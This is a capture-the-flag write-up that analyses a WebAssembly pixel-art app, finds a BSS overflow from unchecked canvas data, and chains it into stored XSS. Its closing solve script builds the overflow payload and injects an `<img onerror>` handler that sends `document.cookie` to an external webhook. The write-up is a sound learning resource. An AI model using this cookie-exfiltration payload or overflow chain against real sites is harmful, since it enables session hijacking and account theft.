Overflow over BSS in wasm
This was the only challenge I worked on during this CTF, but I'm proud to have solved it within 2 hours (unfortunately the admin bot was broken, so I couldn't submit until the next morning). All disassembly was done with diswasm, although others may find the Ghidra WASM plugin more intuitive.
The challenge gives a web app with the ability to draw RGB pixels onto a canvas, with 3 layers available. All the colors of each layer are stored in the wasm's memory, and each frame they are applied back onto the canvas. You are also given the ability to save your canvas art, at which point the client rips the R, G, B and A channels of each layer out of the wasm and sends them to the server. The server then creates a link to the art and sends it back to the client. When visiting the link client-side, the layers are loaded back into the wasm, BUT there is a dangerous overflow at this point in the program logic, which will be described further later on. The solve idea is to find a way to send the server some art data which, when submitted to and viewed by the admin bot, triggers some sort of XSS that leaks its cookies.
Lines 96-107 in index.html (uploaded below) are only rendered when visiting a previously saved artwork. Since we're expected to send something to the admin bot to get the cookie, it's reasonable to assume that this code is where the XSS-based exploitation starts.
Any function call starting with _ is an export from the WASM:
{% if saved %}
const px = '{{ px }}';
const name = '{{ name }}';
_clearCanvas();
const bin = base64ToArr(px);
const arr = arrToCharArr(bin);
_copyCanvas(arr, bin.length);
_setName(strToCharArr(name), name.length);
{% endif %}
Assuming that some bug arises from the code above, I looked into the variables name and px, which are templated in by the Python app.py (uploaded below).
@app.route('/save', methods=['POST'])
def post_image():
    img, name = request.json['img'], request.json['name']
    id = uuid4()
    images[id] = {
        'img': img,
        'name': name
    }
    return redirect('/img/' + str(id))

@app.route('/img/<uuid:id>')
def image_id(id):
    if id not in images:
        return redirect('/')
    img = images[id]['img']
    name = images[id]['name']
    return render_template('index.html', px=img, name=name, saved=True)
The code shows that img and name get no sanitization or size checks, neither when the image is created nor when it is viewed. At this point it was clear to me that there was some sort of overflow going on in the wasm that would allow for exploitation. At first I feared the worst and assumed it was some sort of twisted heap overflow. Fortunately the overflow was over the BSS.
The FIRST thing you do when coming across a wasm program is PRAY that it was coded in C/C++ and not Rust or Go.
(module
(func $env.emscripten_run_script (;0;) (import "env" "emscripten_run_script") (param i32))
Fortunately, the first lines of Chromium's devtools disassembly gave it away: Emscripten-compiled C/C++. How relieving haha.
Scrolling down through Chromium's disassembly, I started seeing some very exciting stuff.
(func $copyCanvas (;240;) (export "copyCanvas") (param $var0 i32) (param $var1 i32)
(local $var2 i32)
(local $var3 i32)
(; . . . ;)
(local $var12 i32)
global.get $global0
local.set $var2
i32.const 16
local.set $var3
local.get $var2
local.get $var3
i32.sub
local.set $var4
Already starting to see some familiar functions: copyCanvas is shown here. From this code alone you can also tell that the wasm is (for the most part) unminified. First, let me make it clear that $global0 is LLVM's equivalent of RSP (the stack pointer) in wasm. The RBP equivalent is generally stored in another local. In unminified LLVM-generated wasm functions there is a local.set after almost every single operation, whereas in minified code the operations are inlined.
Minified LLVM output would have the first instructions of a function look more like this:
global.get $global0
i32.const 16
i32.sub
local.set $var4 ;; or local.tee
;; aka $var4 = $global0 - 16
But in unminified:
global.get $global0
local.set $var2
i32.const 16
local.set $var3
local.get $var2
local.get $var3
i32.sub
local.set $var4
;; aka $var2 = $global0
;; $var3 = 16
;; $var4 = $var2 - $var3
To most people, this unminified code looks less readable, and sure, the WAT itself is noisier, but it's way easier for a decompiler to work with. diswasm is very good at dealing with this unminified style of wasm, so it is the perfect tool for this.
Let's use diswasm to check out some of the functions called by the plausibly vulnerable code at lines 96-107 in index.html. I hand-tuned the decompilation of some of these for readability:
void copyCanvas(char* pixels, int pixellen) {
    /* $func938 was memcpy */
    memcpy(0x21924, pixels, pixellen);
    /* smth was free */
    free(pixels);
}
void setName(char* nameptr, int namelen) {
    /* clamp to 7 chars so the NUL terminator fits in 8 bytes */
    if (namelen >= 8) namelen = 7;
    /* i lives at stack offset 0x4 */
    for (int i = 0; i < namelen; ++i) {
        ((char*) 0x2191c)[i] = nameptr[i];
    }
    ((char*) 0x2191c)[namelen] = 0;
    free(nameptr);
    return;
}
void clearCanvas() {
    /* $func941 seemed like memset so I substituted early on */
    /* memset(dest, value, size): fill both buffers with 0xff */
    memset(0x2091c, 0xff, 0x1000);
    memset(0x21924, 0xff, 0x3000);
}
Notable addresses in BSS as observed in the code above:
0x2091c -> some sort of 4096 byte long array
0x2191c -> some sort of 8 byte long array
0x21924 -> some sort of 4096 * 3 byte long array
The fact that they are all next to each other means they were either in a struct or just declared consecutively:
#define CANVAS_SIZE (32)
#define BYTES_PER_PIXEL (4) /* rgba */
#define LAYER_CNT (3)
// address@=0x2091c
uint8_t image[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
// address@=0x2191c
char name[8];
// address@=0x21924
uint8_t imageLayers[LAYER_CNT][CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
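As a quick sanity check on that layout, here is a minimal sketch that lays the three buffers out back to back from the first observed address and prints where each one starts and ends. The `layOut` helper is hypothetical (it is not part of the challenge), and the sizes are the ones inferred from the decompilation above.

```javascript
// Sizes inferred from the decompiled memset/memcpy calls.
const CANVAS_SIZE = 32;
const BYTES_PER_PIXEL = 4;
const LAYER_CNT = 3;
const LAYER_BYTES = CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL; // 0x1000

// Hypothetical helper: place fields consecutively starting at `base`.
function layOut(base, fields) {
  const out = {};
  let addr = base;
  for (const [field, size] of fields) {
    out[field] = { start: addr, end: addr + size };
    addr += size;
  }
  return out;
}

const layout = layOut(0x2091c, [
  ["image", LAYER_BYTES],
  ["name", 8],
  ["imageLayers", LAYER_BYTES * LAYER_CNT],
]);

for (const [field, { start, end }] of Object.entries(layout)) {
  console.log(field, "0x" + start.toString(16), "-> 0x" + end.toString(16));
}
```

The computed start addresses match the ones seen in the decompilation, which supports the idea that nothing sits between the buffers. Whatever is stored at the end address of imageLayers is the first thing an oversized copy into it would clobber.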
At this point in the analysis it became pretty clear what we were able to manipulate. But I still wasn't sure where the XSS came from in all this. So, like a pro hacker, I searched for "innerHTML =" in the JS code. One result:
const setName = () => {
    const name = UTF8ToString(_getName());
    document.getElementById('name-h1').innerHTML = name;
}
This is on lines 88-92 of index.html. After seeing this it was ultra clear: the exploit was to overflow image into name and start writing arbitrary HTML content onto the page. One thing I was confused about: setName was not imported, and it wasn't in any of the ASM_CONSTS, so how could it be run? Naturally I searched for "setName" in the diswasm disassembly, and found it inside the "loop" export (which, after looking into it, seemed to be called every frame).
fimport_emscripten_run_script(0x14fac /* "setName()" */ );
I assumed this just meant the name was being read back out of wasm memory and written into the page's HTML every frame. With that, I had to turn around and find out how to overflow image.
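To see why writing past the 8-byte name buffer matters, here is a minimal sketch of a NUL-terminated string read. `readCString` is a hypothetical ASCII-only stand-in for Emscripten's UTF8ToString, and the memory size and `NAME_PTR` offset are made up for the demo. The point is that the reader only stops at a zero byte and knows nothing about the declared size of the buffer.

```javascript
const memory = new Uint8Array(64); // toy linear memory
const NAME_PTR = 16;               // made-up offset of the 8-byte name buffer
const NAME_SIZE = 8;

// Hypothetical stand-in for UTF8ToString (ASCII only): read until NUL.
function readCString(mem, ptr) {
  let end = ptr;
  while (end < mem.length && mem[end] !== 0) end++;
  return String.fromCharCode(...mem.subarray(ptr, end));
}

// Mirrors the decompiled setName: at most 7 chars plus a terminator.
function boundedSetName(mem, text) {
  const len = Math.min(text.length, NAME_SIZE - 1);
  for (let i = 0; i < len; i++) mem[NAME_PTR + i] = text.charCodeAt(i);
  mem[NAME_PTR + len] = 0;
}

// What an out-of-bounds write achieves: bytes land past the 8-byte buffer.
function rawWrite(mem, ptr, text) {
  for (let i = 0; i < text.length; i++) mem[ptr + i] = text.charCodeAt(i);
  mem[ptr + text.length] = 0;
}

boundedSetName(memory, "<img src=x>");
const viaSetName = readCString(memory, NAME_PTR);

rawWrite(memory, NAME_PTR, "<img src=x>");
const viaOverflow = readCString(memory, NAME_PTR);

console.log(JSON.stringify(viaSetName), JSON.stringify(viaOverflow));
```

Going through the setName export only ever yields 7 characters, which is too short for a useful tag, while any write primitive that reaches the bytes after name gets the full string handed to innerHTML.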
You'd think we could probably just use the memcpy from earlier (reposting the previous decompilation, with the destination named):
void copyCanvas(char* pixels, int pixellen) {
    /* $func938 was memcpy */
    memcpy(imageLayers, pixels, pixellen);
    /* smth was free */
    free(pixels);
}
But no, because it's copying the canvas content into imageLayers, which sits after image and name. So how in the world could we overflow image? I started to look at any other user code in the wasm that could get called, starting with the main function.
int main() {
    $func18(0x20);
    $func476(0x20, 0x20, 0x0, 0x20914, 0x20910);
    $func80(0x303, 0x0);
    *((unsigned int *) 0x20918) = $func670(0x0, 0x20, 0x20, 0x20, 0x0, 0x0, 0x0, 0x0);
    fimport_emscripten_set_main_loop(0x1, 0x0, 0x1);
    return 0x0;
}
I didn't understand what any of the code was doing except the fimport_emscripten_set_main_loop(0x1, 0x0, 0x1) call, so I just started with that haha. This is the source code for that import:
function _emscripten_set_main_loop(func, fps, simulateInfiniteLoop) {
    var browserIterationFunc = getWasmTableEntry(func);
    setMainLoop(browserIterationFunc, fps, simulateInfiniteLoop);
}
As you can see, it takes the first argument and uses it as an index into the function table to get a function reference to call every tick. Since the first argument is 1 when called in main, we just need to look at the element at index 1 of the function table. Luckily that is available in diswasm's output at the bottom (but before the memory dump).
// Function table
(*__function_table[602])() = {
NULL,
$func12, // $func245 void ()
According to the disassembly, $func12 is the function that gets exported as "loop", so that confirms our assumption that the loop function is called every frame. After a quick disassembly + hand-tuning, this is what the loop function is doing.
#define CANVAS_SIZE (32)
#define BYTES_PER_PIXEL (4) /* rgba */
#define LAYER_CNT (3)
// address@=0x2091c
uint8_t image[CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
// address@=0x2191c
char name[8];
// address@=0x21924
uint8_t imageLayers[LAYER_CNT][CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL];
// address=@0x24924;
uint16_t imagePixelCount;
// O[0] Decompilation of $func245, known as $func12
export "loop"; // $func245 is exported to "loop"
void $func12() {
    // offset=0x1c
    int local_1c;
    // offset=0x18
    int i;
    // offset=0x14
    int local_14;
    // offset=0x10
    int j;
    // offset=0xc
    int local_c;
    /* I ignored this stuff (diswasm also has bugged if statements rn so this might not be the full code)
    label$1: {
        if (((*((unsigned int *) *((unsigned int *) 0x20918)) & 0x2) == 0x0)) break label$1;
        $func686(*((unsigned int *) 0x20918));
    };
    local_1c = *((unsigned int *) *((unsigned int *) 0x20918) + 0x14);
    */
    // For every pixel, copy the highest
    // priority (in terms of layers) visible pixel,
    // defaulting with the bottom layer, into the canvas
    for (int i = 0x0; i < imagePixelCount; i += 4) {
        // This code basically gets the highest
        // priority layer {top mid bottom} that
        // is still visible (with alpha of 0xFF)
        // and stores that layer index into the
        // `layer` variable
        int layer = 0; /* but if none are visible, default to the bottom layer */
        for (int j = 0; j < 3; ++j) {
            if (0xFF - imageLayers[j][i + 0x3] == 0xFF) layer = j;
        }
        // copy pixel from that visible layer into the image
        // (the raw decompilation computed the layer offset as layer << 0xc,
        // i.e. layer * 0x1000, which is the same as indexing by layer)
        image[i] = imageLayers[layer][i];
        image[i+1] = imageLayers[layer][i + 1];
        image[i+2] = imageLayers[layer][i + 2];
        image[i+3] = 0xFF - imageLayers[layer][i + 3];
    }
    // Put name into the html
    fimport_emscripten_run_script(0x14fac /* "setName()" */ );
    // idk
    memcpy(local_1c, 0x2091c, 0x1000);
    /* I feel for some reason that this has to do with SDL mutexes or something, also ignored it
    label$7: {
        if (((*((unsigned int *) *((unsigned int *) 0x20918)) & 0x2) == 0x0)) break label$7;
        $func687(*((unsigned int *) 0x20918));
    };
    local_c = $func489(*((unsigned int *) 0x20910), *((unsigned int *) 0x20918));
    $func496(*((unsigned int *) 0x20910));
    $func499(*((unsigned int *) 0x20910), local_c, 0x0, 0x0);
    $func502(*((unsigned int *) 0x20910));
    $func488(local_c);
    */
    return;
}
Seeing this, you can tell that imagePixelCount sits right after imageLayers in memory (at a higher address) and is therefore something we can overflow into. So all we need to do is overwrite imagePixelCount, by overflowing imageLayers, with a number large enough to let the loop write bytes into name.
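The whole chain can be modelled on a toy memory. The sketch below is an approximation built only from the decompilation above, not the challenge's real code: offsets are relative to image, the loop bound is treated as a byte offset exactly as the decompiled loop indexes it, its starting value is an assumption, and `buildPayload` and `readCString` are hypothetical helpers.

```javascript
const LAYER_BYTES = 32 * 32 * 4;         // 0x1000 bytes per layer
const IMAGE = 0;                         // image[0x1000]
const NAME = IMAGE + LAYER_BYTES;        // name[8]
const LAYERS = NAME + 8;                 // imageLayers[3][0x1000]
const BOUND = LAYERS + 3 * LAYER_BYTES;  // uint16 loop bound (imagePixelCount)
const memory = new Uint8Array(0x6000);

// Unchecked copy, like the decompiled copyCanvas.
function copyCanvas(bytes) { memory.set(bytes, LAYERS); }

// Per-frame copy, like the decompiled loop (stored alpha 0x00 means visible).
function loop() {
  const bound = memory[BOUND] | (memory[BOUND + 1] << 8);
  for (let i = 0; i < bound; i += 4) {
    let layer = 0;
    for (let j = 0; j < 3; j++) {
      if (memory[LAYERS + j * LAYER_BYTES + i + 3] === 0x00) layer = j;
    }
    const src = LAYERS + layer * LAYER_BYTES + i;
    memory[IMAGE + i] = memory[src];
    memory[IMAGE + i + 1] = memory[src + 1];
    memory[IMAGE + i + 2] = memory[src + 2];
    memory[IMAGE + i + 3] = 0xff - memory[src + 3];
  }
}

function readCString(ptr) {
  let end = ptr;
  while (memory[end] !== 0) end++;
  return String.fromCharCode(...memory.subarray(ptr, end));
}

// Hypothetical payload builder: three layers plus the bytes after them.
function buildPayload(text) {
  const padded = Math.ceil((text.length + 1) / 4) * 4;
  const payload = new Uint8Array(3 * LAYER_BYTES + padded);
  // Mark every pixel invisible so the loop always falls back to layer 0.
  for (let k = 3; k < payload.length; k += 4) payload[k] = 0xff;
  // Text goes at the start of the second layer, alpha slots pre-inverted.
  for (let k = 0; k < padded; k++) {
    const byte = k < text.length ? text.charCodeAt(k) : 0;
    payload[LAYER_BYTES + k] = k % 4 === 3 ? 0xff - byte : byte;
  }
  // Bytes past the third layer overwrite the loop bound (little endian).
  const bound = LAYER_BYTES + padded;
  payload[3 * LAYER_BYTES] = bound & 0xff;
  payload[3 * LAYER_BYTES + 1] = (bound >> 8) & 0xff;
  return payload;
}

memory[BOUND] = LAYER_BYTES & 0xff;      // assumed initial bound
memory[BOUND + 1] = LAYER_BYTES >> 8;
copyCanvas(buildPayload("<b>pwned</b>"));
loop();
const leaked = readCString(NAME);
console.log(leaked);
```

With the enlarged bound, the loop keeps reading "layer 0" past its end (which is really the second layer) and keeps writing "image" past its end (which is really name). The payload also has to extend past the overwritten bound with invisible alpha bytes, otherwise the layer-2 visibility check in the overflowed range would read zeros and pick the wrong source.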
Instead of walking through every part of the exploit one by one here, I'll just give a brief synopsis and a commented version of the solve script.
Basically, all that was required was a buffer that fills the CANVAS_SIZE * CANVAS_SIZE * BYTES_PER_PIXEL * LAYER_CNT bytes of imageLayers and then keeps going. With the bytes past the end, I wrote a size similar to the previous imagePixelCount size of CANVAS_SIZE * CANVAS_SIZE, but added a couple more for space for the payload. Then I had to adjust the buffer that was doing the overflowing, because that same buffer also contains the content that will be written. So after CANVAS_SIZE * CANVAS_SIZE pixels of data in the first layer, I added some bytes that would be read as the second layer at first, then as a continuation of layer 0 later. Layer 0 is the default, so as long as the rest of the bytes I sent were not visible, the loop would "render" (aka copy) them over and overwrite name. Because of that, I just injected my payload into those bytes and got the flag.
// This is where the cookies will be sent
const WEBHOOK = "usually i generate one from webhook.site";
// XSS is the HTML
const XSS = "<img src=# onerror='fetch(`" + WEBHOOK + "?`+document.cookie)'>";
// This function creates a byte array of N pixels, all with rgba(R, G, B, A)
const createNPixels = (N, R, G, B, A) => Array(N).fill([R, G, B, A]).flat();
// Just using this as a constant for the "invisible" alpha pixel. If this is a pixel's alpha
// Then the pixel is not visible (as considered by the renderer/copier)
const invis = 0xFF - 0x00;
const BYTES_PER_PIXEL = 4;
const PIXELS_PER_LAYER = 32 * 32;
// Rounds up, the amount of pixels required for the payload
const PIXELS_OVERFLOWN = Math.ceil((XSS.length + 1) / 4);
// The overflow is what the new name will be set to
// defaulting it to null bytes; for null terminated C strings
const OVERFLOW = new Uint8Array(createNPixels(PIXELS_OVERFLOWN, 0x00, 0x00, 0x00, 0xFF - 0x00));
// Put the XSS at the top of the overflow
OVERFLOW.set(XSS.split``.map(e => e.charCodeAt()), 0);
// Invert every alpha byte
for (let i = 0; i < OVERFLOW.length; i += 4) {
    OVERFLOW[i + 3] = 0xFF - OVERFLOW[i + 3];
}
// This will be sent to the server
const PAYLOAD = new Uint8Array([
    // Fill in the first layer with emptiness
    createNPixels(PIXELS_PER_LAYER, 0x00, 0x00, 0x00, invis),
    // Then fill `PIXELS_OVERFLOWN` more bytes, using the OVERFLOW (XSS pixel code)
    // This is what overflows `name`
    [...OVERFLOW],
    // Fill in the rest of the 2 layers
    createNPixels(PIXELS_PER_LAYER * 2 - PIXELS_OVERFLOWN, 0x00, 0x00, 0x00, invis),
    // Then overflow the `imagePixelCount` variable in BSS to allow for all this hijacking
    (PIXELS_OVERFLOWN >> 0) & 0xFF, (PIXELS_OVERFLOWN >> 0) & 0xFF, 0x00, invis,
    // Then create layer 3's overflow pixels (because the size was adjusted)
    createNPixels(PIXELS_OVERFLOWN - 1, 0x00, 0x00, 0x00, invis)
].flat());
// Send it to the server and get your url to send to admin
fetch('/save', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
        name: "",
        img: btoa(String.fromCharCode(...PAYLOAD))
    })
}).then((res) => {
    console.log(res.url)
});
- It's worth noting that all ALPHA bytes are inverted in canvas image data, causing all the weird alpha stuff in the solve script.
- Solve script, decompilation, and relevant server files are uploaded below
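The alpha inversion is easy to check in isolation. The sketch below assumes only what the decompiled loop shows, namely that every fourth byte is copied as 0xFF minus its stored value. `invertAlphaSlots` is a hypothetical helper, and the sample string is arbitrary.

```javascript
// Hypothetical helper: flip every 4th byte (the alpha slot), leave the rest.
function invertAlphaSlots(bytes) {
  return bytes.map((b, k) => (k % 4 === 3 ? 0xff - b : b));
}

const text = "abcdefgh";
const raw = Uint8Array.from(text, (c) => c.charCodeAt(0));

// What has to be stored in the layer data...
const stored = invertAlphaSlots(raw);
// ...so that the loop's own inversion restores the intended bytes.
const copied = invertAlphaSlots(stored);

console.log(Array.from(stored), String.fromCharCode(...copied));
```

Since the inversion is its own inverse, pre-inverting the alpha slots of the payload is enough for the text to come out intact on the other side of the copy.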
Sign up for bcactf.com - we have some intense wasm-based challenges planned.